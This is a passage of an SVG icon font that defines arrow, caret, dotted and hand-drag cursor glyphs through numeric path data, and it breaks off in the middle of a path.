<glyph glyph-name="bubble-up" horiz-adv-x="1000" unicode="&#xea66;" d="M511 525c-6 6-16 6-22 0l-130-130c-6-6-16-6-23 0l-37 38c-7 6-7 16 0 22l190 190c6 7 16 7 22 0l190-190c6-6 6-16 0-22l-38-38c-6-6-16-6-22 0l-130 130z m72-154c0-45-37-83-83-83s-83 38-83 83 37 84 83 84 83-38 83-84z m-23-159c0-33-27-60-60-60s-60 27-60 60c0 33 27 60 60 60 33 0 60-27 60-60z m-17-119c0-24-19-43-43-43s-44 19-44 43 20 44 44 44 43-20 43-44z" />
<glyph glyph-name="caret-down" horiz-adv-x="1000" unicode="&#xea67;" d="M534 213l255 254c19 19 13 35-14 35h-550c-27 0-33-16-14-35l255-254c19-19 49-19 68 0z" />
<glyph glyph-name="caret-left" horiz-adv-x="1000" unicode="&#xea68;" d="M362 384l255 255c19 19 34 13 34-14v-550c0-27-15-33-34-14l-255 255c-19 19-19 49 0 68z" />
<glyph glyph-name="caret-right" horiz-adv-x="1000" unicode="&#xea69;" d="M637 384l-255 255c-18 19-34 13-34-14v-550c0-27 16-33 34-14l255 255c19 19 19 49 0 68z" />
<glyph glyph-name="caret-up" horiz-adv-x="1000" unicode="&#xea6a;" d="M534 487l255-255c19-18 13-34-14-34h-550c-27 0-33 15-14 34l255 255c19 19 49 19 68 0z" />
<glyph glyph-name="circled-down" horiz-adv-x="1000" unicode="&#xea6b;" d="M63 350c0-241 196-438 437-438s438 197 438 438-196 438-438 438-437-196-437-438z m460-40l202 202c9 9 25 9 35 0l59-59c9-10 9-26 0-35l-296-296c-10-10-26-10-35 0l-296 296c-10 9-10 25 0 35l59 59c9 9 25 9 35 0l202-202c9-10 25-10 35 0z" />
<glyph glyph-name="circled-left" horiz-adv-x="1000" unicode="&#xea6c;" d="M500 788c-241 0-437-196-437-438s196-438 437-438 438 197 438 438-196 438-438 438z m-40-461l202-202c9-9 9-25 0-35l-59-59c-10-9-26-9-35 0l-296 296c-10 10-10 26 0 35l296 296c9 10 25 10 35 0l59-58c9-10 9-26 0-36l-202-202c-10-9-10-25 0-35z" />
<glyph glyph-name="circled-right" horiz-adv-x="1000" unicode="&#xea6d;" d="M63 350c0-241 196-438 437-438s438 197 438 438-196 438-438 438-437-196-437-438z m477 12l-202 202c-9 10-9 26 0 36l59 58c10 10 26 10 35 0l296-296c10-9 10-25 0-35l-296-296c-9-9-25-9-35 0l-59 59c-9 10-9 26 0 35l202 202c10 10 10 26 0 35z" />
<glyph glyph-name="circled-up" horiz-adv-x="1000" unicode="&#xea6e;" d="M500-88c242 0 438 197 438 438s-196 438-438 438-437-196-437-438 196-438 437-438z m-12 478l-202-202c-10-9-26-9-35 0l-59 59c-10 10-10 26 0 35l296 296c9 10 25 10 35 0l296-296c9-9 9-25 0-35l-59-59c-10-9-26-9-35 0l-202 202c-10 10-26 10-35 0z" />
<glyph glyph-name="collapse" horiz-adv-x="1000" unicode="&#xea6f;" d="M702 593l-57 57-145-144-144 144-58-57 202-202z m-404-486l58-57 144 145 145-145 57 57-202 202z" />
<glyph glyph-name="cursor-drag" horiz-adv-x="1000" unicode="&#xea70;" d="M532 364c9 4 17 9 23 16 14 13 22 30 23 49h248l-125-122 10-10 142 138-142 138-10-11 125-122h-248c-1 19-9 37-22 50s-31 21-50 22v249l122-126 10 11-138 142-138-142 11-11 121 126v-249c-37-4-67-34-70-71h-250l125 121-10 11-142-138 142-138 10 10-125 122h250c3-35 28-64 62-70l-13-336 92 81 92-191 62 29-87 186 123-5-223 241z m-95 71c0 16 6 32 17 44 11 11 26 19 42 20h10c34-3 60-30 60-64 0-28-18-52-43-61l-35 37-1-39c-29 6-50 32-50 63z" />
<glyph glyph-name="curved-double-left" horiz-adv-x="1000" unicode="&#xea71;" d="M494 554c5 10 5 27 0 37l-27 52c-6 10-14 10-20 0l-144-275c-6-10-6-26 0-36l144-274c6-10 14-10 19 0l28 51c5 10 5 27 0 37l-98 186c-6 10-6 26 0 36l98 186z m105-222c-5 10-5 26 0 36l99 186c5 10 5 27 0 37l-28 52c-5 10-14 10-19 0l-145-275c-5-10-5-26 0-36l145-274c5-10 14-10 19 0l28 51c5 10 5 27 0 37l-99 186z" />
<glyph glyph-name="curved-double-right" horiz-adv-x="1000" unicode="&#xea72;" d="M506 554c-5 10-5 27 0 37l28 52c5 10 14 10 19 0l145-275c5-10 5-26 0-36l-145-274c-5-10-14-10-19 0l-28 51c-5 10-5 27 0 37l99 186c5 10 5 26 0 36l-99 186z m-105-222c5 10 5 26 0 36l-98 186c-6 10-6 27 0 37l27 52c5 10 14 10 19 0l145-275c5-10 5-26 0-36l-145-274c-5-10-14-10-19 0l-27 51c-6 10-6 27 0 37l98 186z" />
<glyph glyph-name="curved-down" horiz-adv-x="1000" unicode="&#xea73;" d="M793 418l-52 28c-10 5-27 5-37 0l-186-99c-10-5-26-5-36 0l-186 99c-10 5-27 5-37 0l-51-28c-10-5-10-14 0-19l274-145c10-5 26-5 36 0l275 145c10 5 10 14 0 19z" />
<glyph glyph-name="curved-left" horiz-adv-x="1000" unicode="&#xea74;" d="M549 642l-145-274c-5-10-5-26 0-36l145-274c5-10 14-10 19 0l28 51c5 11 5 27 0 37l-99 186c-5 10-5 26 0 36l99 186c5 10 5 27 0 37l-28 52c-5 10-14 10-19-1z" />
<glyph glyph-name="curved-right" horiz-adv-x="1000" unicode="&#xea75;" d="M432 642l-28-51c-5-10-5-27 0-37l99-186c5-10 5-26 0-36l-99-186c-5-10-5-27 0-37l28-51c5-11 14-11 19 0l145 274c5 10 5 26 0 36l-145 274c-5 11-14 11-19 0z" />
<glyph glyph-name="curved-up" horiz-adv-x="1000" unicode="&#xea76;" d="M784 301l-274 145c-10 5-27 5-37 0l-274-145c-10-5-10-14 0-19l52-28c10-5 26-5 36 0l186 99c10 5 26 5 37 0l186-99c10-5 26-5 36 0l52 28c10 5 10 14 0 19z" />
<glyph glyph-name="dotted-down" horiz-adv-x="1000" unicode="&#xea77;" d="M678 360c-19 0-34 15-34 34 0 19 15 34 34 34 19 0 34-15 34-34 0-19-15-34-34-34z m-178 0c-19 0-34 15-34 34 0 19 15 34 34 34 19 0 34-15 34-34 0-19-15-34-34-34z m-88 0c-19 0-34 15-34 34 0 19 15 34 34 34 18 0 33-15 33-34 0-19-15-34-33-34z m-90 0c-18 0-33 15-33 34 0 19 15 34 33 34 19 0 34-15 34-34 0-19-15-34-34-34z m90-88c-19 0-34 15-34 33 0 19 15 34 34 34 18 0 33-15 33-34 0-18-15-33-33-33z m177 0c-18 0-34 15-34 33 0 19 16 34 34 34 18 0 33-15 33-34 0-18-15-33-33-33z m-355 177c-19 0-34 15-34 34 0 18 15 34 34 34 19 0 34-16 34-34 0-19-15-34-34-34z m266-266c-19 0-34 15-34 34 0 18 15 34 34 34 19 0 34-16 34-34 0-19-15-34-34-34z m0 89c-19 0-34 15-34 33 0 19 15 34 34 34 19 0 34-15 34-34 0-18-15-33-34-33z m89 88c-18 0-34 15-34 34 0 19 16 34 34 34 18 0 33-15 33-34 0-19-15-34-33-34z m177 89c-18 0-34 15-34 34 0 18 15 34 34 34 19 0 34-16 34-34 0-19-15-34-34-34z m-444 0c-18 0-33 15-33 34 0 18 15 34 33 34 19 0 34-16 34-34 0-19-15-34-34-34z m356 0c-19 0-34 15-34 34 0 18 15 34 34 34 19 0 34-16 34-34 0-19-15-34-34-34z m-178 0c-19 0-34 15-34 34 0 18 15 34 34 34 19 0 34-16 34-34 0-19-15-34-34-34z m89 0c-18 0-34 15-34 34 0 18 16 34 34 34 18 0 33-16 33-34 0-19-15-34-33-34z m-177 0c-19 0-34 15-34 34 0 18 15 34 34 34 18 0 33-16 33-34 0-19-15-34-33-34z" />
<glyph glyph-name="dotted-left" horiz-adv-x="1000" unicode="&#xea78;" d="M510 528c0-19 15-34 34-34 19 0 34 15 34 34 0 19-15 34-34 34-19 0-34-15-34-34z m0-178c0-19 15-34 34-34 19 0 34 15 34 34 0 19-15 34-34 34-19 0-34-15-34-34z m0-88c0-19 15-34 34-34 19 0 34 15 34 34 0 18-15 33-34 33-19 0-34-15-34-33z m0-90c0-18 15-33 34-33 19 0 34 15 34 33 0 19-15 34-34 34-19 0-34-15-34-34z m-88 90c0-19 15-34 33-34 19 0 34 15 34 34 0 18-15 33-34 33-18 0-33-15-33-33z m0 177c0-18 15-34 33-34 19 0 34 16 34 34 0 18-15 33-34 33-18 0-33-15-33-33z m177-355c0-19 15-34 34-34 18 0 34 15 34 34 0 19-16 34-34 34-19 0-34-15-34-34z m-266 266c0-19 15-34 34-34 18 0 34 15 34 34 0 19-16 34-34 34-19 0-34-15-34-34z m89 0c0-19 15-34 33-34 19 0 34 15 34 34 0 19-15 34-34 34-18 0-33-15-33-34z m88 89c0-18 15-34 34-34 19 0 34 16 34 34 0 18-15 33-34 33-19 0-34-15-34-33z m89 177c0-18 15-34 34-34 18 0 34 15 34 34s-16 34-34 34c-19 0-34-15-34-34z m0-444c0-18 15-33 34-33 18 0 34 15 34 33 0 19-16 34-34 34-19 0-34-15-34-34z m0 356c0-19 15-34 34-34 18 0 34 15 34 34 0 19-16 34-34 34-19 0-34-15-34-34z m0-178c0-19 15-34 34-34 18 0 34 15 34 34 0 19-16 34-34 34-19 0-34-15-34-34z m0 89c0-18 15-34 34-34 18 0 34 16 34 34 0 18-16 33-34 33-19 0-34-15-34-33z m0-177c0-19 15-34 34-34 18 0 34 15 34 34 0 18-16 33-34 33-19 0-34-15-34-33z" />
<glyph glyph-name="dotted-right" horiz-adv-x="1000" unicode="&#xea79;" d="M490 528c0-19-15-34-34-34-19 0-34 15-34 34 0 19 15 34 34 34 19 0 34-15 34-34z m0-178c0-19-15-34-34-34-19 0-34 15-34 34 0 19 15 34 34 34 19 0 34-15 34-34z m0-88c0-19-15-34-34-34-19 0-34 15-34 34 0 18 15 33 34 33 19 0 34-15 34-33z m0-90c0-18-15-33-34-33-19 0-34 15-34 33 0 19 15 34 34 34 19 0 34-15 34-34z m88 90c0-19-15-34-33-34-19 0-34 15-34 34 0 18 15 33 34 33 18 0 33-15 33-33z m0 177c0-18-15-34-33-34-19 0-34 16-34 34 0 18 15 33 34 33 18 0 33-15 33-33z m-177-355c0-19-15-34-34-34-18 0-34 15-34 34 0 19 16 34 34 34 19 0 34-15 34-34z m266 266c0-19-15-34-34-34-18 0-34 15-34 34 0 19 16 34 34 34 19 0 34-15 34-34z m-89 0c0-19-15-34-33-34-19 0-34 15-34 34 0 19 15 34 34 34 18 0 33-15 33-34z m-88 89c0-18-15-34-34-34-19 0-34 16-34 34 0 18 15 33 34 33 19 0 34-15 34-33z m-89 177c0-18-15-34-34-34-18 0-34 15-34 34s16 34 34 34c19 0 34-15 34-34z m0-444c0-18-15-33-34-33-18 0-34 15-34 33 0 19 16 34 34 34 19 0 34-15 34-34z m0 356c0-19-15-34-34-34-18 0-34 15-34 34 0 19 16 34 34 34 19 0 34-15 34-34z m0-178c0-19-15-34-34-34-18 0-34 15-34 34 0 19 16 34 34 34 19 0 34-15 34-34z m0 89c0-18-15-34-34-34-18 0-34 16-34 34 0 18 16 33 34 33 19 0 34-15 34-33z m0-177c0-19-15-34-34-34-18 0-34 15-34 34 0 18 16 33 34 33 19 0 34-15 34-33z" />
<glyph glyph-name="dotted-up" horiz-adv-x="1000" unicode="&#xea7a;" d="M678 340c-19 0-34-15-34-34 0-19 15-34 34-34 19 0 34 15 34 34 0 19-15 34-34 34z m-178 0c-19 0-34-15-34-34 0-19 15-34 34-34 19 0 34 15 34 34 0 19-15 34-34 34z m-88 0c-19 0-34-15-34-34 0-19 15-34 34-34 18 0 33 15 33 34 0 19-15 34-33 34z m-90 0c-18 0-33-15-33-34 0-19 15-34 33-34 19 0 34 15 34 34 0 19-15 34-34 34z m90 88c-19 0-34-15-34-33 0-19 15-34 34-34 18 0 33 15 33 34 0 18-15 33-33 33z m177 0c-18 0-34-15-34-33 0-19 16-34 34-34 18 0 33 15 33 34 0 18-15 33-33 33z m-355-177c-19 0-34-15-34-34 0-18 15-34 34-34 19 0 34 16 34 34 0 19-15 34-34 34z m266 266c-19 0-34-15-34-34 0-18 15-34 34-34 19 0 34 16 34 34 0 19-15 34-34 34z m0-89c-19 0-34-15-34-33 0-19 15-34 34-34 19 0 34 15 34 34 0 18-15 33-34 33z m89-88c-18 0-34-15-34-34 0-19 16-34 34-34 18 0 33 15 33 34 0 19-15 34-33 34z m177-89c-18 0-34-15-34-34 0-18 15-34 34-34 19 0 34 16 34 34 0 19-15 34-34 34z m-444 0c-18 0-33-15-33-34 0-18 15-34 33-34 19 0 34 16 34 34 0 19-15 34-34 34z m356 0c-19 0-34-15-34-34 0-18 15-34 34-34 19 0 34 16 34 34 0 19-15 34-34 34z m-178 0c-19 0-34-15-34-34 0-18 15-34 34-34 19 0 34 16 34 34 0 19-15 34-34 34z m89 0c-18 0-34-15-34-34 0-18 16-34 34-34 18 0 33 16 33 34 0 19-15 34-33 34z m-177 0c-19 0-34-15-34-34 0-18 15-34 34-34 18 0 33 16 33 34 0 19-15 34-33 34z" />
<glyph glyph-name="double-left" horiz-adv-x="1000" unicode="&#xea7b;" d="M428 578l65-65-164-163 164-163-65-65-228 228 228 228z m372-65l-163-163 163-163-65-65-228 228 228 228 65-65z" />
<glyph glyph-name="double-right" horiz-adv-x="1000" unicode="&#xea7c;" d="M572 578l-65-65 164-163-164-163 65-65 228 228-228 228z m-372-65l163-163-163-163 65-65 228 228-228 228-65-65z" />
<glyph glyph-name="expand-alt" horiz-adv-x="1000" unicode="&#xea7d;" d="M500 165l-144 144-58-57 202-202 202 202-57 57-145-144z m0 371l145-145 57 57-202 202-202-202 57-57 145 145z" />
<glyph glyph-name="hand-down" horiz-adv-x="1000" unicode="&#xea7e;" d="M775 552c-7 9-9 23-12 36-6 21-11 42-16 64-3 12-8 18-22 18-86-1-173-1-260 0-12 0-18-4-21-16-10-40-21-79-33-117-3-10-9-21-17-28-58-51-117-101-175-151-17-15-27-32-21-55 5-23 18-37 40-44 19-6 36 0 51 13 27 22 53 45 79 67 3 2 6 4 9 5 5 2 11-1 12-6 2-3 2-6 2-10 0-104 0-208 0-312v-41c0-38 20-62 52-62 30-1 53 24 53 61 0 14 0 28 0 42v194c0 4 1 8 1 11 1 7 3 12 5 12 2 1 5-3 6-8 1-3 1-6 1-9 1-37 0-74 1-110 0-29 17-50 43-51 25-1 45 16 47 44 2 41 1 81 2 122 0 4 0 7 0 11 1 3 1 5 2 7 1 4 5 5 7 3 1-2 2-4 2-5 1-4 2-6 2-10 0-31 0-62 0-93 0-27 15-44 40-45 24-1 46 19 46 45 1 43 0 87 1 130 0 3 0 6 1 9 1 5 4 10 6 10 2 0 4-5 5-10 0-3 1-6 1-9 0-31 0-61 0-92 0-24 13-39 36-43 20-3 42 9 48 29 3 10 4 20 4 30 1 92 1 184 1 276-1 32-7 62-29 88z m-305 143h256c15 0 27 12 27 28v37c0 15-12 27-27 27h-256c-15 0-27-12-27-27v-37c0-16 12-28 27-28z" />
<glyph glyph-name="hand-drag" horiz-adv-x="1000" unicode="&#xea7f;" d="M783 313c0 8-1 17-3 25-6 16-24 27-41 24-20-3-31-16-31-36 0-25 0-51 0-76 0-2 0-5-1-8-1-4-2-8-4-8s-4 4-5 8c0 3-1 5-1 8 0 36 0 72 0 108-1 21-19 38-40 37-21-1-33-14-33-37 0-26 0-52-1-78 0-2 0-5-1-7-1-2-1-3-2-4-1-2-5-1-6 2-1 1-1 3-1 5-1 4-1 7-1 10 0 34 1 68-1 101-2 24-19 38-41 37-21-1-36-18-36-42 0-31 0-61 0-92 0-2-1-5-2-7-1-4-3-8-5-7s-3 4-4 10c0 3 0 6 0 9v161l-1 26c6 6 10 13 14 20h121l-50-50c-4-4-4-9 0-12l19-20c4-3 9-3 12 0l100 99c3 4 3 9 0 12l-100 100c-3 3-8 3-11 0l-20-20c-3-3-3-8 0-12l47-47h-120c-6 14-18 25-32 31v122l50-51c3-3 9-3 12 0l20 20c3 3 3 8 0 12l-100 99c-3 3-8 3-12 0l-99-99c-3-3-3-9 0-12l20-20c3-3 8-3 12 0l47 47v-120c-13-6-23-16-29-29h-120l47 47c3 4 3 9 0 12l-20 20c-3 3-8 3-12 0l-99-100c-3-3-3-8 0-11l99-100c3-3 9-3 12 0l20 20c3 3 3 8 0 12l-51 50h122c3-7 8-14 13-20v-26c0-86 0-173 0-259 0-3-1-6-2-8-1-5-6-7-10-5-3 1-5 2-7 3-23 19-45 38-68 57-12 10-27 15-43 10-19-5-30-17-35-36-4-19 4-34 18-46 50-42 100-84 149-126 7-6 12-14 15-23 10-32 19-64 28-97 2-10 7-14 18-14 73 1 147 1 220 0 12 0 16 5 19 15 3 18 8 36 13 54 3 10 4 22 10 29 19 22 24 47 25 74 0 76 0 153-1 229z" />
<glyph glyph-name="hand-drag1" horiz-adv-x="1000" unicode="&#xea80;" d="M807 361c0 10-1 19-4 28-6 19-27 30-46 27-22-4-34-18-34-40-1-28 0-57-1-85 0-3 0-6-1-9 0-5-2-9-4-9-2 0-5 4-6 9 0 3-1 6-1 9 0 40 0 80 0 120-1 24-21 43-44 42-24 0-38-16-38-42 0-29 0-57 0-86 0-3-1-6-2-9 0-2-1-3-2-4-2-3-6-1-7 2-1 2-1 4-1 6 0 4-1 7-1 11 0 38 1 76-2 113-1 27-21 43-45 41-24-1-40-20-41-47 0-34 1-68 0-102 0-3 0-6-1-9-1-5-4-8-6-8-2 0-4 5-4 11-1 4-1 8-1 11 0 60 0 120 0 181 0 13 0 26 0 39 0 34-22 57-51 57-30 0-49-22-49-58v-38c0-97 0-194 0-291 0-3-1-6-2-9-1-5-6-8-11-6-3 1-6 3-9 4-25 21-50 43-75 64-14 11-30 17-49 11-20-6-33-19-38-40-5-22 4-38 20-52 55-47 111-93 166-141 8-6 14-16 17-25 11-36 22-73 31-109 3-12 9-15 20-15 83 0 165 0 247-1 13 0 19 6 21 17 5 20 10 40 15 60 3 11 5 25 12 33 20 24 27 52 27 82 0 86 0 172 0 257z m-341 312c88 0 159-71 159-158h26c0 102-83 184-185 184s-185-82-185-184c0-44 15-84 40-116l20 18c-21 27-34 61-34 98 0 87 71 158 159 158z m-197-302c4 1 7 2 10 2-30 39-47 88-47 141 0 130 105 235 234 235s234-105 234-235c0 0 0 0 0-1 0 0 0 0 0-1l1 0 38-5c0 2 0 5 0 8 0 150-122 273-273 273-151 0-273-123-273-274 0-59 19-113 51-158 6 7 15 12 25 15z" />
<glyph glyph-name="hand-drag2" horiz-adv-x="1000" unicode="&#xea81;" d="M815 386c-6 18-25 28-43 26-20-4-32-17-32-38 0-26 0-53 0-79 0-3 0-6-1-8-1-5-3-8-4-9-2 0-4 4-5 9-1 2-1 5-1 8-1 37 0 75-1 112 0 23-19 40-41 39-22 0-35-15-35-39 0-27 0-54 0-81 0-2-1-5-2-7 0-2-1-4-2-5-1-2-5-1-6 2-1 2-1 4-1 6-1 4-1 7-1 10-1 36 0 71-2 106-1 24-19 39-42 38-22-1-38-19-38-44 0-32 0-63 0-95 0-3-1-6-1-8-1-5-4-8-6-8s-3 5-4 11c0 3 0 7-1 10v168c0 12 0 24 0 37 0 32-20 53-47 53-28 0-45-21-45-54v-36c0-90 0-181 0-271 0-3-1-5-2-8-2-5-6-7-11-5-3 1-5 2-8 4-23 19-47 39-70 58-13 11-28 16-45 11-19-6-31-18-36-38-4-20 4-35 19-48 51-43 104-87 155-131 7-6 13-15 15-24 11-33 21-67 29-101 3-11 9-14 19-14 77 0 154 0 230 0 12-1 17 4 20 15 4 19 8 37 13 56 3 10 5 23 11 31 20 22 26 48 26 76 0 80 0 160 0 239 0 9-1 18-4 26z m-314 265c82 0 148-66 148-148h24c0 95-77 172-172 172s-172-77-172-172c0-40 14-78 38-107l18 16c-20 25-32 57-32 91 0 82 67 148 148 148z m435-37l-74 140c-3 5-7 5-10 0l-14-27c-2-5-2-13 0-18l41-77h-159c-44 75-125 125-219 125-94 0-176-51-220-127v2h-160l41 77c2 5 2 13 0 18l-14 27c-3 5-7 5-10 0l-73-140c-3-5-3-13 0-18l73-140c3-5 7-5 10 0l14 27c3 5 3 13 0 18l-41 78h138c-8-24-12-49-12-76 0-55 17-106 47-148 6 7 14 12 24 14 3 1 6 2 9 2-28 37-44 83-44 132 0 121 98 219 218 219s218-98 218-219c0 0 0-1 0-1 0 0 0-1 0-1l1 0 35-5c0 2 0 5 0 7 0 27-4 52-11 76h135l-41-78c-2-5-2-13 0-18l14-27c3-5 7-5 10 0l74 140c2 5 2 13 0 18z" />
<glyph glyph-name="hand-drawn-alt-down" horiz-adv-x="1000" unicode="&#xea82;" d="M220 648c6 0 12-4 15-8l265-265 266 267c6 5 15 7 22 4 7-3 12-10 12-18v-280c0-6-2-11-6-14l-280-281-1 0h-26l-281 281c-4 3-6 8-6 13v282c0 10 9 19 20 19z m-14-19l1-1-1-1v-280c0-3 1-7 4-9l279-280h22l279 280c3 2 4 6 4 9v281c0 5-3 10-8 12-6 2-12 1-16-3l-268-268-2-2-269 269c-3 4-7 6-11 6-8 0-13-6-14-13z m28-35l256-256c1-1 3-2 5-3h0l1-1c1 0 2 0 4 0l3 0 2 1c2 1 4 2 5 3l63 64 5-4-69-97-5 3c9 18 8 19 8 21-1 2-3 4-5 4h-1l-2 1-3-2c0 0-1-1-1-1l-14-16c-10-12-22-25-33-38l-16-19 39 76c2 3 0 8-3 10-1 0-2 1-3 1-1 0-3-2-7-6l-1 0c-6-6-16-18-34-37l-15-18 38 75c1 1 1 2 1 3 0 2-1 4-3 6-3 2-7 1-9-1l-60-63 10 19c7 14 14 27 20 37 15 29 15 29 14 32-1 2-2 3-4 4-1 1-2 1-3 1-1 0-4-1-7-5l0 0c-4-5-10-12-18-22l-5 3 17 33c1 2 1 3 0 5 0 2-2 4-3 4-2 1-2 1-3 1-1 0-4-1-7-5l-2 0 0-1c-1-1-2-2-2-4-3-4-6-10-18-18l-5-3v5l0 1c8 18 13 28 16 33 3 6 3 7 3 8-1 3-3 4-4 5-3 0-6-1-7-2l-59-62 10 19c32 61 34 64 32 68 0 3-2 4-5 5-2 1-5 0-7-2-10-12-22-26-33-39l-17-19 12 22c26 51 27 54 26 57-1 3-3 5-5 5-3 1-5 0-7-2-10-10-23-23-36-36l-13-13 8 17c26 50 27 53 26 56 0 2-2 4-3 4-2 1-4 1-6 1l-37-12 3 6c10 19 13 25 14 28l-7-2-8 2c-4-7-14-27-21-40l-4-8 3-4c2-2 5-2 8-2l38 13-3-6c-11-22-29-56-42-82l-4-7 3-4c1-1 2-1 2-2 1 0 2 0 3 0 4 0 16 11 43 38l13 13-8-17c-12-23-26-49-37-70-1-1-1-3 0-5 0-2 2-3 3-4 1-1 2-1 3-1 1 0 3 1 7 5l1 1c6 5 15 15 32 34l16 19-11-22c-27-52-28-53-27-57 1-2 3-4 5-4 3-1 5 0 7 2l59 62-9-18c-11-21-22-43-32-62l-1-3c-2-3-1-7 2-9 3-2 7-1 10 2 7 9 15 20 24 30l18 23-33-66c-2-3-1-8 3-10 1 0 2-1 3-1 1 0 3 2 7 5l0 1c4 4 9 10 15 18l5-3c-16-31-15-32-14-35 0-1 2-3 3-4 3-1 7-1 9 2l57 60-9-18c-30-59-33-65-32-68 0-1 2-3 3-4 2 0 2-1 3-1 1 0 4 2 8 6 2 2 6 7 12 13 6 6 13 14 22 25l15 17-38-75c-2-3-1-8 3-10 1 0 2 0 2 0 2 0 4 1 8 5 8 7 19 20 44 49l17 19-12-22c-12-24-25-48-35-68-1-2-1-4-1-5 1-2 2-3 4-4 3-2 7-1 9 2l94 132 5-3c-23-45-53-103-80-153-1-3-1-4-1-6 1-2 2-3 4-4 1-1 2-1 3-1 0 0 2 1 6 5l1 2 1 0 1 2c14 17 42 62 110 172l5-3c-3-6-6-12-9-18l-18-34c-44-88-63-124-70-140l-2-2 1 0-1-3c-2-3-2-4-2-5l15-9-3 6 90 152 5-3c-58-114-75-148-80-162l0-1-4-5-1 0-9-9-266 265 0 1v241z m5-87c9 17 16 30 17 32l1 2 11-3 11 3-40 39v-73z m31 3l24 7c3 1 6 1 9 0l-23 23 0-1c2-5 2-7-10-29z m22-46c9 9 16 16 23 23 4 4 8 5 13 4 0 0 1-1 1-1l-19 20c0 0 0-1 0-1 2-5 2-6-18-45z m29-22c7 7 13 14 18 20 3 4 8 5 13 4 0 0 1 0 2 0l-17 17c0 0 0-1 0-1 1-4 2-6-16-40z m-77 32c-2 0-3 1-5 1v-56c11 21 24 46 34 64l-25-8c-1 0-3-1-4-1z m94-71l30 31c3 4 8 5 12 4 1 0 1 0 2-1l-21 22 0-1c2-6 2-6-23-55z m37-8c4 4 5 7 7 10 1 2 2 3 3 5l1 1 2 2 0 0c7 6 11 6 15 4l-15 15c0-1 0-2 1-3 1-3 0-4-4-12-2-4-5-11-10-22z m-132-9c-1 0-3 0-4 1v-31l261-261 5 5-22 14-1 1 0 1c-1 2-1 3 0 7l-1 0 5 8c7 15 24 49 65 129-42-67-62-99-73-112l-3-7-2 0c-4-3-6-5-9-5-2 0-4 1-5 2-3 1-6 4-7 7-1 4 0 7 1 10 20 38 41 79 61 117l-70-99c-4-5-12-7-18-3-3 1-5 5-6 8 0 3 0 6 2 9 7 13 15 29 23 45-14-16-22-25-28-30l0-1c-5-4-8-6-12-6-2 0-3 1-5 1-6 4-9 11-5 18l16 33c-2-2-4-5-5-7-7-6-10-10-13-13-6-6-9-8-12-8-2 0-4 1-5 2-4 2-6 5-7 8-1 4-2 5 23 54l-29-31c-4-4-10-5-15-3-3 2-6 4-7 8-1 3-1 5 3 15v0l0 0c-4-4-7-5-10-5-2 0-4 0-6 1-3 2-5 5-6 8-1 3-1 7 1 10l7 14c-2-2-4-5-6-7-4-6-12-7-17-3-6 3-8 10-5 16l2 4c6 13 14 28 22 43l-31-33c-3-3-8-5-13-4-4 1-8 5-9 9-2 5-2 6 16 40-7-8-12-13-16-17l-2-3-1 1c-4-4-7-6-10-6-2 0-3 1-5 2-3 2-5 4-6 8-1 3-1 7 0 10 9 15 19 35 28 54-24-25-29-28-34-28z m162 4c0 0 0 1 0 1l1 2 1 0c7 7 11 7 15 5l-12 12c0 0 0-1 0-1 1-3 1-7-1-10l-4-9z m0-56l31 33c3 3 9 5 14 3l-21 20 1-1c1-5 1-5-15-36-3-5-6-12-10-19z m108-1c2-2 4-4 5-7 0-1 0-2 0-3l35 50-39-39c0-1-1-1-1-1z m-73-14c8 9 14 15 18 19l2 3 0 0c5 4 8 5 10 5 2 0 3 0 5-1l-18 18c1-2 1-4 1-5 0-2 0-4-1-6l-17-33z m25-24c6 7 12 14 17 20l12 14 0 0h-1l-1 0c-2 1-4 3-6 5l-4 4c1-3 1-7-1-11l-16-32z m41-181l4-6c4 10 14 31 36 74l-40-68z m258 478l-107-182-5 3c28 55 40 79 45 90 1 4 2 6 2 7 0 0 0 1 0 1 0 2-2 3-3 4l-2 1-4 1 74 75z m-64-73c2-1 4-4 5-6 0-1 0-2 0-3 0-2-1-4-3-9-1-3-3-7-5-11l38 65-35-36z m67 47v-29l-3-5c-9-13-25-39-63-104l-5 3c21 39 38 73 51 97 6 11 10 20 14 28l6 10z m-18-47c4 7 7 12 10 16l2 2v5c-3-5-6-10-9-17-1-2-2-4-3-6z m18-14v-41l-1-1c0 0 0-1-1-3-6-7-13-20-26-40l-49-79-6 3 83 161z m-47-104l14 22c13 21 21 33 26 40l1 2v15l-41-79z m-51 96l5-3c-15-23-41-63-92-146l-5 3c15 30 24 49 29 60l0 2c2 5 2 6 2 7-1 2-2 3-4 4l-6 1 71 72z m-60-69c2-1 4-4 5-6 0-2 0-3-1-7h2l-3-4c-1-3-3-7-5-12 21 33 35 56 46 74l-44-45z m158 4v-31l-4-5c-11-17-24-36-37-54l-5 3 19 35c9 17 16 31 21 41l6 11z m-17-45c3 4 5 8 8 12l3 4v5c-4-6-7-13-11-21z m17-17v-17l-17-17 9 18c1 2 1 3 2 4l6 12z m-116-118l5-2-6-13-23-23 14 22c3 5 7 11 10 16z m-45-19l5-3-34-66-26-26 11 19c14 25 29 50 44 76z" />
<glyph glyph-name="hand-drawn-alt-left" horiz-adv-x="1000" unicode="&#xea83;" d="M778 50h-281c-5 0-10 2-13 6l-281 281v26l0 1 280 280c4 4 9 6 14 6h281c11 0 20-9 20-20 0-6-4-12-9-16l-264-264 267-266c5-6 7-14 4-22-3-7-11-12-18-12z m-570 289l280-279c2-3 6-4 9-4h281c5 0 10 3 12 8 2 6 1 12-3 16l-270 270 2 2 266 267c4 3 7 7 7 11 0 8-6 14-13 14l-2 0 0 0h-280c-3 0-7-1-9-4l-280-279v-22z m508-255l-31 0-3 1c-13 10-39 26-104 64l3 5c39-20 73-38 97-50 11-7 20-11 28-15l10-5z m-29 5h5c-5 3-10 6-17 9-2 1-4 2-6 4 7-5 12-9 16-11l2-2z m-32-5l-42 0c0 0-1 1-3 1-8 6-21 14-42 27l-77 49 3 5 161-82z m-40 5h15l-79 41 20-13c21-13 34-21 42-27 1 0 2 0 2-1z m-33-5h-31l0 0c-18 12-39 26-59 40l3 5 42-22c14-8 25-13 35-18l10-5z m-29 5h5c-6 4-13 7-21 11 6-3 11-7 16-11z m-33-5h-17l-17 17 17-9c2-1 4-2 5-3l12-5z m221 2l-181 107 3 5c55-28 79-40 90-45 4-1 6-2 7-2l1 0c2 1 3 2 4 4 0 0 1 1 1 1l1 4 4-3 70-71z m-101 67l65-38-36 35c-1-2-4-4-6-5-2 0-3-1-12 3-3 1-6 3-11 5z m4 23c-23 16-67 43-146 92l3 5c33-16 53-26 62-29l0 0c3-1 5-2 6-2 0 0 1 0 1 0 2 1 3 2 4 4 0 0 0 1 0 2l2 5 71-72-3-5z m-95 67c32-20 56-35 